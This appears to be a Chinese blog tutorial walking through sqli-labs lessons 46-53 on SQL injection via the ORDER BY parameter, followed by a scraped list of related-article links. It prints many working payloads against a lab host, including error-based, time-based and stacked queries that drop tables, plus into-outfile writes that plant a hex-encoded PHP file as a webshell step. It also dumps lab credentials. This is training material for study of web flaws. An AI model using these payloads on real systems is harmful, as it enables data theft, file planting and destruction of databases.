青蛙爱轮滑

Sqli-labs Less46-53 order by 后的注入

本文记录 SQL 注入的学习过程，资料为 SQLi

SQLi 博客目录

Oeder By 后的注入

注入原理

?sort=1 desc
?sort=1 asc

显示结果不同，说明可以注入

desc是 descend 降序意思

asc 是 ascend 升序意思

可利用 order by 后的一些参数进行注入

2.1 order by 后的数字可以作为一个注入点。

order by 后的数字可以作为一个注入点。也就是构造order by 后的一个语句，让该语句执行结果为一个数，我们尝试

?sort=right(version(),1)

?sort=left(version(),1)

没有报错，但是 right 换成 left 都一样，说明数字没有起作用，我们考虑布尔类型。此时我们可以用报错注入和延时注入。

此处可以直接构造 ?sort= 后面的一个参数。此时，我们可以有三种形式：
1. 直接添加注入语句，?sort=(select ***)
2. 利用一些函数。例如 rand()函数等。?sort=rand(sql 语句)
  
  Ps：此处我们可以展示一下 rand(true)和 rand(false)的结果是不一样的。
  
  ?sort=rand(true)
  
  ?sort=rand(false)
3. 利用 and，例如 ?sort=1 and (加 sql 语句)。
  
  同时，sql 语句可以利用报错注入和延时注入的方式，语句我们可以很灵活的构造。
报错注入例子

?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))
rand() 例子

?sort=rand(ascii(left(database(),1))=115)

?sort=rand(ascii(left(database(),1))=116)

从上述两个图的结果，对比 rand(ture) 和 rand(false) 的结果，可以看出报错注入是成功的
延时注入例子

?sort=1 and if(ascii(substr(database(),1,1))=116,0,sleep(5))
同时也可以用 ?sort=1 and 后添加注入语句

?sort=1 and left(database(),2)>‘sa’–+

2.2 procedure analyse 参数后注入

利用 procedure analyse 参数，我们可以执行报错注入。

同时，在 procedure analyse 和 order by 之间可以存在limit 参数，

我们在实际应用中，往往也可能会存在 limit 后的注入，可以利用 rocedure analyse 进行注入。

?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

2.3 将查询结果导入到文件当中

将查询结果导入到文件当中

?sort=1 into outfile "/tmp/test1.txt"

查看文件

root@ubuntu:# cat /tmp/test1.txt 
	1	Dumb	Dumb
	2	Angelina	I-kill-you
	3	Dummy	p@ssword
	4	secure	crappy
	5	stupid	stupidity
	6	superman	genious
	7	batman	mob!le
	8	admin	admin
	9	admin1	admin1
	10	admin2	admin2
	11	admin3	admin3
	12	dhakkan	dumbo
	14	admin4	admin4
	38	less38	hello
	39	less39	hello
	40	less40	hello
	109	hello	hello
	110	less41	hello
	144	less44	hello

Less - 46: GET - Error based - Numeric - ORDER BY CLAUSE

1. 源代码

	$id=$_GET['sort'];
    $sql = "SELECT * FROM users ORDER BY $id";

从上述的 sql 语句中我们可以看出，我们的注入点在 order by 后面的参数中，而 order by不同于的我们在 where 后的注入点，不能使用 union 等进行注入。

2. 测试漏洞

http://10.10.10.137/sqli-labs/Less-46/?sort=1 desc
http://10.10.10.137/sqli-labs/Less-46/?sort=1 asc

显示结果不同，说明可以注入

3. 注入

可利用 order by 后的一些参数进行注入

3.1 order by 后的数字可以作为一个注入点。

order by 后的数字可以作为一个注入点。也就是构造order by 后的一个语句，让该语句执行结果为一个数，我们尝试
```
 http://10.10.10.137/sqli-labs/Less-46/?sort=right(version(),1)
 http://10.10.10.137/sqli-labs/Less-46/?sort=left(version(),1)
```
没有报错，但是 right 换成 left 都一样，说明数字没有起作用，我们考虑布尔类型。此时我们可以用报错注入和延时注入。

此处可以直接构造 ?sort= 后面的一个参数。此时，我们可以有三种形式：
1. 直接添加注入语句，?sort=(select ***)
2. 利用一些函数。例如 rand()函数等。?sort=rand(sql 语句)
  
  Ps：此处我们可以展示一下 rand(true)和 rand(false)的结果是不一样的。
```
 http://10.10.10.137/sqli-labs/Less-46/?sort=rand(true)
 http://10.10.10.137/sqli-labs/Less-46/?sort=rand(false)
```
3. 利用 and，例如 ?sort=1 and (加 sql 语句)。
  
  同时，sql 语句可以利用报错注入和延时注入的方式，语句我们可以很灵活的构造。

报错注入例子

 http://10.10.10.137/sqli-labs/Less-46/?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))

rand() 演示

 http://10.10.10.137/sqli-labs/Less-46/?sort=rand(ascii(left(database(),1))=115)

 http://10.10.10.137/sqli-labs/Less-46/?sort=rand(ascii(left(database(),1))=116)

从上述两个图的结果，对比 rand(ture) 和 rand(false) 的结果，可以看出报错注入是成功的

延时注入例子

 http://10.10.10.137/sqli-labs/Less-46/?sort= (SELECT IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,md5('1')),null) FROM (select database() as current) as tb1)

 http://10.10.10.137/sqli-labs/Less-46/?sort=1%20and%20If(ascii(substr(database(),1,1))=116,0,sleep(5))

同时也可以用 ?sort=1 and 后添加注入语句

 http://10.10.10.137/sqli-labs/Less-46/?sort=1 and left(database(),2)>'sa'--+

3.2 procedure analyse 参数后注入

利用 procedure analyse 参数，我们可以执行报错注入。同时，在 procedure analyse 和 order by 之间可以存在limit 参数，我们在实际应用中，往往也可能会存在 limit 后的注入，可以利用 rocedure analyse 进行注入。

http://10.10.10.137/sqli-labs/Less-46/?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

3.3

将查询结果导入到文件当中

http://10.10.10.137/sqli-labs/Less-46/?sort=1 into outfile "/tmp/test1.txt"

查看文件

root@ubuntu:# cat /tmp/test1.txt 
	1	Dumb	Dumb
	2	Angelina	I-kill-you
	3	Dummy	p@ssword
	4	secure	crappy
	5	stupid	stupidity
	6	superman	genious
	7	batman	mob!le
	8	admin	admin
	9	admin1	admin1
	10	admin2	admin2
	11	admin3	admin3
	12	dhakkan	dumbo
	14	admin4	admin4
	38	less38	hello
	39	less39	hello
	40	less40	hello
	109	hello	hello
	110	less41	hello
	144	less44	hello

Less - 47: GET - Error based - String - ORDER BY CLAUSE

源代码

 $id=$_GET['sort'];
 $sql = "SELECT * FROM users ORDER BY '$id'";

order by 后的参数

我们只能使用and 来进行报错和延时注入。
1. 和 and rand 相结合的方式
```
 http://10.10.10.137/sqli-labs/Less-47/index.php?sort=1'and rand(ascii(left(database(),1))=115)--+
```
```
 http://10.10.10.137/sqli-labs/Less-47/index.php?sort=1'and rand(ascii(left(database(),1))=116)--+
```
  此处后期经过测试，还是存在问题的，我们不能使用这种方式进行准确的注入。此处留下只是一个示例。
2. 可以利用报错的方式进行
```
 http://10.10.10.137/sqli-labs/Less-47/?sort=1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+
```
  可以看到 user()的内容，同时可以构造其他的语句进行注入。
  
  这里再放一个报错注入，原理和上面的payload 是一样的，都是利用的mysql 重复项的原理。
```
 http://10.10.10.137/sqli-labs/Less-47/?sort=1'and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+
```
  此处重复了version(),所以就爆出了版本号
3. 延时注入
```
 http://10.10.10.137/sqli-labs/Less-47/?sort=1'and If(ascii(substr(database(),1,1))=115,0,sleep(5))--+
```
  这里因 database() 为 security，所以第一个字母的 s 的 ascii 为 115，此处直接显示，当改为 116 或者其他的数字的时候，就要延时了，我们这里就不贴图展示了，可以通过脚本爆破
procedure analyse 参数后注入

利用 procedure analyse 参数，我们可以执行报错注入。同时，在 procedure analyse 和 order by 之间可以存在 limit 参数，我们在实际应用中，往往也可能会存在 limit 后的注入，可以利用 procedure analyse 进行注入。
```
 http://10.10.10.137/sqli-labs/Less-47/?sort=1' procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+
```

导入导出文件into outfile 参数

 http://10.10.10.137/sqli-labs/Less-47/?sort=1'into outfile "/tmp/test2.txt"--+

将查询结果导入到文件当中

 root@ubuntu:# cat /tmp/test2.txt 
 	1	Dumb	Dumb
 	2	Angelina	I-kill-you
 	3	Dummy	p@ssword
 	4	secure	crappy
 	5	stupid	stupidity
 	6	superman	genious
 	7	batman	mob!le
 	8	admin	admin
 	9	admin1	admin1
 	10	admin2	admin2
 	11	admin3	admin3
 	12	dhakkan	dumbo
 	14	admin4	admin4

那这个时候我们可以考虑上传网马，利用lines terminated by

Into outtfile /tmp/test3.txt lines terminated by 0x(网马进行 16 进制转换)

将进行十六进制编码 0x3c3f70687020706870696e666f28293b3f3e2020
```
 http://10.10.10.137/sqli-labs/Less-47/?sort=1'into outfile "/tmp/test3.php"lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+
```
可以搭配其他漏洞访问这个页面

Less - 48: GET - Error based - Blind- Numeric- ORDER BY CLAUSE##

原理

本关与less-46 的区别在于报错注入不能使用，不进行错误回显，因此其他的方法我们依旧是可以使用的。

可以利用sort=rand(true/false)进行判断。

源代码

 $id=$_GET['sort'];
 $sql = "SELECT * FROM users ORDER BY $id";

测试

 http://10.10.10.137/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=178)

 http://10.10.10.137/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=115)

And 后的延时注入

 http://10.10.10.137/sqli-labs/Less-48/?sort=1%20and%20(If(ascii(substr(database(),1,1))=115,0,sleep(5)))

导入导出文件注入

 http://127.0.0.1/sqllib/Less-48/?sort=1 into outfile "/tmp/test4.txt"--+

 root@ubuntu:/# cat /tmp/test4.txt 
 	1	Dumb	Dumb
 	2	Angelina	I-kill-you
 	3	Dummy	p@ssword
 	4	secure	crappy
 	5	stupid	stupidity
 	6	superman	genious
 	7	batman	mob!le
 	8	admin	admin
 	9	admin1	admin1
 	10	admin2	admin2
 	11	admin3	admin3
 	12	dhakkan	dumbo

Less - 49: GET - Error based - String- Blind - ORDER BY CLAUSE##

源代码

 $id=$_GET['sort'];
 $sql = "SELECT * FROM users ORDER BY '$id'";

测试

本关与47 关基本类似，区别在于没有错误回显，所以我们可以通过延时注入和导入文件进行注入。

利用延时注入
```
 Less-49/?sort=1' and (If(ascii(substr((select username from users where id=1),1,1))=69,0,sleep(5)))--+
```
可以构造substr 的第一个参数进行后续注入

利用 into outfile 进行注入
```
 http://10.10.10.137/sqli-labs/Less-49/?sort=1'into outfile "/tmp/test5.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+
```
可以搭配其他漏洞访问 /tmp/test5.php

Less - 50: GET - Error based - ORDER BY CLAUSE -numeric - Stacked Injection##

源代码

 $id=$_GET['sort'];
 $sql="SELECT * FROM users ORDER BY $id";

原理

从本关开始我们开始进行order by stacked injection

执行 sql 语句我们这里使用的是 mysqli_multi_query()函数，而之前我们使用的是 mysqli_query()，区别在于 mysqli_multi_query()可以执行多个 sql 语句，而 mysqli_query()只能执行一个sql 语句，那么我们此处就可以执行多个sql 语句进行注入，也就是我们之前提到的 statcked injection。

测试

 http://10.10.10.137/sqli-labs/Less-50/?sort=1;create table less50 like users

已经创建了一个表 less50

 mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | less50             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 5 rows in set (0.00 sec)

 http://10.10.10.137/sqli-labs/Less-50/?sort=1;droptable less50

已经删除了表 less50

 mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 5 rows in set (0.00 sec)

Less - 51: GET - Error based - ORDER BY CLAUSE-String - Stacked Injection

源代码

 $id=$_GET['sort'];
 $sql="SELECT * FROM users ORDER BY '$id'";

测试

 http://10.10.10.137/sqli-labs/Less-51/?sort=1';create table less51 like users--+

发现已经创建了一个表 less51

 mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | less51             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 6 rows in set (0.00 sec)


 http://10.10.10.137/sqli-labs/Less-51/?sort=1';drop table less51--+

发现已经删除了一个表 less51

 mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 6 rows in set (0.00 sec)

Less - 52: GET - Blind based - ORDER BY CLAUSE -numeric - Stacked Injection##

源代码

 $id=$_GET['sort'];
 $sql="SELECT * FROM users ORDER BY $id";

测试

和 less50 是一样的，只是这里的 mysql 错误不会在前台显示，但是对于 stacked injection 是一样的利用方式

 http://10.10.10.137/sqli-labs/Less-52/?sort=1;create table less52 like users

发现已经创建了一个表 less52

 mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | less52             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 5 rows in set (0.00 sec)

删除表 less52

 http://10.10.10.137/sqli-labs/Less-52/?sort=1;drop table less52

已经删除了表 less52

 mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 4 rows in set (0.00 sec)

Less - 53: GET - Blind based - ORDER BY CLAUSE-String - Stacked Injection##

源代码

 $id=$_GET['sort'];
 $sql="SELECT * FROM users ORDER BY '$id'";

测试

和 less51 是一样的，只是这里的 mysql 错误不会在前台显示，但是对于 stacked injection 是一样的利用方式

 http://10.10.10.137/sqli-labs/Less-53/?sort=1';create table less53 like users--+

发现创建了表 less53

 mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | less53             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 5 rows in set (0.00 sec)

测试

 http://10.10.10.137/sqli-labs/Less-53/?sort=1';drop table less53 --+

发现已经删除了 less53

 mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 4 rows in set (0.00 sec)

你可能感兴趣的:(web安全)

Web安全:Web体系架构存在的安全问题和解决方室程序员-张师傅前端安全 web安全前端
Web体系架构在提供丰富功能和高效服务的同时，也面临着诸多安全问题。这些问题可能涉及数据泄露、服务中断、系统被控制等多个方面，对企业和个人造成不可估量的损失。以下是对Web体系架构中存在的安全问题及解决方案的详细分析：Web体系架构存在的安全问题注入攻击SQL注入：攻击者通过在输入字段中插入恶意SQL代码，操控后台数据库，窃取、篡改或删除数据。OS命令注入：攻击者通过输入字段插入恶意代码，执行系统
CTF——web方向学习攻略一则孤庸 CTF 网络安全 CTF
1计算机基础操作系统：熟悉Linux命令，方便使用Kali。网络技术：HCNA、CCNA。编程能力：拔高项，有更好。2web应用HTTP协议：必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题
学习笔记：FW内容安全概述 TKE_yinian
内容安全概述信息安全概述主要威胁关于防护简介内容安全威胁应用层威胁内容安全技术WEB安全应用安全入侵防御检测邮件安全数据安全网络安全反病毒全局环境感知沙箱检测信息安全概述•信息安全是对信息和信息系统进行保护，防止未授权的访问、使用、泄露、中断、修改、破坏并以此提供保密性、完整性和可用性。•为关键资产提供机密性、完整性和可用性（CIA三元组）保护是信息安全的核心目标。CIA（Confidential
网络安全（黑客）自学白帽子凯哥 web安全安全网络安全服务器网络
一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你是一
58手势验证码的分析 allgiveup
做爬虫的小伙伴们肯定都深有体会，爬虫要是遇到验证码了基本上就是GG了。于是爬虫工作者和验证码之间必有一战。随着web安全技术的提升，验证码也一代一代的革新，并且越发的变态。小曾也去研究了各式样的验证码，最后决定拿出58手势验证码和大家分享。分析概述首先我对58手势验证码做一个总体的描述。从触发验证码到验证成功，我们操作的背后需要向服务器发送6个请求，并且还有一次js算法对参数加密。6个请求之间有着
web安全学习笔记（1）头发的天敌是代码 web安全学习笔记 web安全学习笔记
一、网络安全分支1.web安全——网站2.二进制安全物联网安全工控安全二、网站是如何搭建起来的1.服务器服务器与我们的家庭使用电脑有什么区别？①没有显卡②CPU+内存不同于家庭电脑2.操作系统家庭系统：WindowsXPWindows7Windows8Windows9Windows10Windows11服务器操作系统：Windows2000Windows2003Windows2008Windows
Web安全与网络安全：SQL漏洞注入 hong161688 web安全 sql oracle
Web安全与网络安全：SQL漏洞注入引言在Web安全领域，SQL注入漏洞（SQLInjectionVulnerability）是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段，从而操纵后台数据库系统，执行未授权的数据库查询，甚至可能获取数据库管理权限，进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
Web安全与网络安全：SQL漏洞注入 bigbig猩猩 typescript vue.js 前端
Web安全与网络安全：SQL漏洞注入引言在Web安全领域，SQL注入漏洞（SQLInjectionVulnerability）是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段，从而操纵后台数据库系统，执行未授权的数据库查询，甚至可能获取数据库管理权限，进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
Web安全之SQL注入：如何预防及解决 J老熊 Java Web安全 web安全 sql 数据库系统架构面试
SQL注入（SQLInjection）是最常见的Web应用漏洞之一，它允许攻击者通过注入恶意SQL代码来操作数据库，获取、修改或删除数据。作为Java开发者，理解并防止SQL注入攻击是至关重要的。在本篇文章中，我们将详细介绍SQL注入的原理，演示如何在电商交易系统中出现SQL注入漏洞，并提供正确的防范措施和解决方案。1.什么是SQL注入？SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式
Java Web安全与Spring Config对象实战福建低调
本文还有配套的精品资源，点击获取简介：本课程深入探讨JavaWeb开发中的安全实践，包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时，介绍SpringSecurity框架的应用，以及Config对象在Spring配置管理中的作用，包括依赖注入和外部化配置。课程还包括实战演练，通过设置安全环境和安全漏洞模拟，帮助开发者提升应用的安全性和故障排查能力。1.Web安全
自学黑客（网络安全）白袍无涯 web安全网络安全网络安全系统安全运维计算机网络
前言：想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟
Web安全之CSRF攻击详解与防护 J老熊 Java Web安全 web安全 csrf 安全 java 面试运维
在互联网应用中，安全性问题是开发者必须时刻关注的核心内容之一。跨站请求伪造（Cross-SiteRequestForgery,CSRF），是一种常见的Web安全漏洞。通过CSRF攻击，黑客可以冒用受害者的身份，发送恶意请求，执行诸如转账、订单提交等操作，导致严重的安全后果。本文将详细讲解CSRF攻击的原理及其防御方法，结合电商交易系统的场景给出错误和正确的示范代码，并分析常见的安全问题与解决方案，
网络安全（黑客）自学白帽子凯哥 web安全安全网络安全服务器网络
一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你是一
自学黑客（网络安全） L世界凌乱了 web安全安全网络安全网络学习
前言：想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟
SecurityHeaders：为.Net网站添加安全标头，让Web更加安全、避免攻击！编程乐趣 .net 安全前端
网站的安全对于任何一家公司都是非常重要的。为了保证Web安全，其中Http安全标头就是非常重要一个的措施。设定正确的安全头可以增强网站的安全性，因为它们可以帮助防止各种网络攻击，如跨站脚本（XSS）、点击劫持（Clickjacking）和内容类型嗅探（ContentTypeSniffing）等。下面推荐一个开源项目，可以让我们轻松地添加安全相关的HTTP头到网站中。01项目简介NetEscapad
Web安全和渗透测试有什么关系？程序员_大白 web安全安全
做渗透测试的一个环节就是测试web安全，需要明白漏洞产生原理，通过信息收集互联网暴露面，进行漏洞扫描，漏洞利用，必要时进行脚本自编写和手工测试，力求挖出目标存在的漏洞并提出整改建议，当然如果技术再精一些，还要学习内网渗透（工作组和域环境），白盒审计，app，小程序渗透那些了......总之，web安全包含于渗透测试，但不是渗透测试的全部。`黑客&网络安全如何学习今天只要你给我的文章点赞，我私藏的网
网络安全（黑客）自学白帽子凯哥 web安全安全网络安全服务器网络
一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你是一
零基础能学网络安全吗？ leah126 程序员渗透测试编程 web安全安全网络
当然可以。但网络安全有很多方向，如果你想转行网络安全技术方向，建议先着手学web安全方向。因为，web安全相对于整个网络安全行业来说难度是相对比较低的，学起来更加容易入手。虽然渗透测试工程师、溯源取证、红蓝攻防等等这些岗位看起来很不错，但是技术门槛特别高，对于0基础的人来说学起来会相当吃力。所以，web安全方向对于初学者来说是最好入门选择。那么该如何学习呢？1.买一本《白帽子讲web安全》，先了解
【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有这一篇真的够了 webfker from 0 to 1 github git java
目录面经牛客奇安信面经（五星推荐）牛客面经（推荐）渗透测试面经（推荐）渗透测试技巧计网面经SQL注入漏洞注入绕过XXE漏洞最强面经Github面经模拟面WEB安全PHP安全网络安全密码学一、青藤二、360三、漏洞盒子四、未知厂商五、长亭-红队六、qax七、天融信八、安恒九、长亭十、国誉网安十一、360-红队十二、天融信十三、长亭-2十四、360-2十五、极盾科技十六、阿里十七、长亭3十八、qax-
CORS是什么，功能如何实现茶卡盐佑星_ javascript es6
CORS，全称为“跨域资源共享”（Cross-OriginResourceSharing），是一种浏览器技术的规范，允许浏览器向跨源服务器发出XMLHttpRequest请求，从而克服了AJAX只能同源使用的限制。CORS是Web安全领域的一个重要概念，旨在确保浏览器端与服务器端之间安全地进行跨域通信。CORS的功能CORS的主要功能是：安全跨域通信：允许前端页面从与其不同源的服务器请求资源，如A
网站安全检测：推荐 8 款免费的 Web 安全测试工具白帽黑客2659 安全网络测试工具运维服务器 ddos 网络安全
目录1.OWASPZAP(ZedAttackProxy)2.BurpSuiteFreeEdition3.Nikto4.w3af5.SQLMap6.Arachni7.XSSer8.SecurityHeaders.io使用这些工具的建议网站安全是确保数据保护和系统完整性的重要组成部分。对于希望增强网站安全性的开发者和管理员来说，利用有效的工具进行定期的安全测试是必不可少的。以下是8款免费的Web安全测
网络安全笔记-信息安全工程师与网络安全工程师考试大纲（附：Web安全大纲）_信息网络安全师认证(inspc)培训工作大纲程序员安安 web安全笔记网络服务器数据库网络安全安全
Web安全大纲2024信息安全工程师考试大纲1、考试目标通过本考试的合格人员能够掌握网络信息安全的基础知识和技术原理；根据国家网络信息安全相关法律法规及业务安全保障要求，能够规划、设计信息系统安全方案，能够配置和维护常见的网络安全设备及系统；能够对信息系统的网络安全风险进行监测和分析，并给出网络安全风险问题的整改建议；能够协助相关部门对单位的信息系统进行网络安全审计和网络安全事件调查；能够对网络信
javaWeb安全漏洞修复总结 dechen6073 java 数据库 web安全
1Web安全介绍12SQL注入、盲注12.1SQL注入、盲注概述12.2安全风险及原因22.3AppScan扫描建议22.4应用程序解决方案43会话标识未更新73.1会话标识未更新概述73.2安全风险及原因分析73.3AppScan扫描建议83.4应用程序解决方案84已解密登录请求84.1已解密登录请求概述84.2安全风险及原因分析84.3AppScan扫描建议94.4应用程序解决方案95跨站点请
Web安全之XSS跨站脚本攻击 Shadow_143 web安全安全渗透测试
1.XSS漏洞简介XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。攻击成功后，攻击者可能得到更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。2.XSS
小白如何快速入门网络安全里，主要岗位有哪些？ baimao__沧海 web安全安全 linux tcpdump 运维 java
入门Web安全、安卓安全、二进制安全、工控安全还是智能硬件安全等等，每个不同的领域要掌握的技能也不同。当然入门Web安全相对难度较低，也是很多人的首选。主要还是看自己的兴趣方向吧。本文就以下几个问题来说明网络安全大致学习过程网络安全主要岗位有哪些安全领域技术方向分类渗透测试学习路线小白如何快速入门一、网络安全里的主要的岗位有哪些：渗透测试工程师：主要是模拟黑客对目标业务系统进行攻击，点到为止安全运
web安全基础名词概念 pink鱼 web安全安全
本节内容根据小迪安全讲解制作第一天域名：1.1什么是域名？网域名称(英语：DomainName，简称：Domain)，简称域名、网域，是由一串用点分隔的字符组成的互联网上某一台计算机或计算机组的名称，用于在数据传输时标识计算机的电子方位。1.2什么是二级域名，多级域名？二级域名，通常指的是在顶级域名下面再划分的一个域名层次。它的形式通常是“子域名.顶级域名”。比如，在域名“www.example.
【web安全】从2022中科大hackgame web中学习pdflatex RCE和python反序列化热心网友易小姐 python web安全前端
ctf比赛地址：https://hack.lug.ustc.edu.cn大佬博客里wp写的很清楚了，官方wp也写的很好，我比不过大佬，只能把基础多讲一些（大佬在tttang把wp全发了T0T)官方wp:https://github.com/USTC-Hackergame/hackergame2022-writeups大佬全WP：https://miaotony.xyz/?utm_source=tt
网络安全工程师的学习路线程序员鬼鬼 web安全学习安全开发语言计算机网络网络安全 php
Web安全工程师概念基础一．了解黑客是如何工作的1.在虚拟机配置Linux系统2.漏洞测试工具3.msf控制台4.远程工具RATS5.远程访问计算机6.白帽二．技术基础漏斗扫描工具AWVSAWVS简介安装站点扫描扫码结果分析SitecrawlerHTTPEditorTargetfingerAuthenticationTeaterHTTPSnifferHTTPfuzzer网络安全审计工具：Nmap安
Windows Edge浏览器对Web Authentication API的支持分析与实践应用 2402_85758936 前端 windows edge
随着网络技术的发展，Web安全认证方式也在不断进步。WebAuthenticationAPI（通常称为WebAuthn）是一个现代的Web标准，旨在提供更安全、更便捷的认证机制。它支持多种认证方式，包括生物识别技术、硬件令牌和手机认证等。WindowsEdge作为微软的现代浏览器，对WebAuthn的支持情况如何，以及如何在实际开发中应用这一API，是本文将要探讨的主题。WebAuthentica
关于6种Web安全常见的攻防姿势 AI大模型-搬运工 web安全安全网络安全网络网络攻击模型
关于Web安全的问题，是一个老生常谈的问题，作为离用户最近的一层，我们大前端应该把手伸的更远一点。我们最常见的Web安全攻击有以下几种：XSS跨站脚本攻击CSRF跨站请求伪造URL跳转漏洞ClickJacking点击劫持/UI-覆盖攻击SQLInjectionSQL注入OSCommandInjectionOS命令注入一、XSSXSS（CrossSiteScript），中文是跨站脚本攻击；其原本缩写
java解析APK 3213213333332132 java apk linux 解析APK
解析apk有两种方法 1、结合安卓提供apktool工具，用java执行cmd解析命令获取apk信息 2、利用相关jar包里的集成方法解析apk 这里只给出第二种方法，因为第一种方法在linux服务器下会出现不在控制范围之内的结果。 public class ApkUtil { /** * 日志对象 */ private static Logger
nginx自定义ip访问N种方法 ronin47 nginx 禁止ip访问
　　　因业务需要，禁止一部分内网访问接口，　由于前端架了F5，直接用deny或allow是不行的，这是因为直接获取的前端Ｆ５的地址。　　　所以开始思考有哪些主案可以实现这样的需求，目前可实施的是三种：　　　一：把ip段放在redis里，写一段lua 二：利用geo传递变量，写一段
mysql timestamp类型字段的CURRENT_TIMESTAMP与ON UPDATE CURRENT_TIMESTAMP属性 dcj3sjt126com mysql
timestamp有两个属性，分别是CURRENT_TIMESTAMP 和ON UPDATE CURRENT_TIMESTAMP两种，使用情况分别如下： 1. CURRENT_TIMESTAMP 当要向数据库执行insert操作时，如果有个timestamp字段属性设为 CURRENT_TIMESTAMP，则无论这
struts2+spring+hibernate分页显示 171815164 Hibernate
分页显示一直是web开发中一大烦琐的难题，传统的网页设计只在一个JSP或者ASP页面中书写所有关于数据库操作的代码，那样做分页可能简单一点，但当把网站分层开发后，分页就比较困难了，下面是我做Spring+Hibernate+Struts2项目时设计的分页代码，与大家分享交流。　　1、DAO层接口的设计，在MemberDao接口中定义了如下两个方法： public in
构建自己的Wrapper应用 g21121 rap
我们已经了解Wrapper的目录结构，下面可是正式利用Wrapper来包装我们自己的应用，这里假设Wrapper的安装目录为:/usr/local/wrapper。首先，创建项目应用 &nb
[简单]工作记录_多线程相关 53873039oycg 多线程
最近遇到多线程的问题,原来使用异步请求多个接口(n*3次请求) 方案一使用多线程一次返回数据,最开始是使用5个线程,一个线程顺序请求3个接口,超时终止返回缺点测试发现必须3个接
调试jdk中的源码，查看jdk局部变量程序员是怎么炼成的 jdk 源码
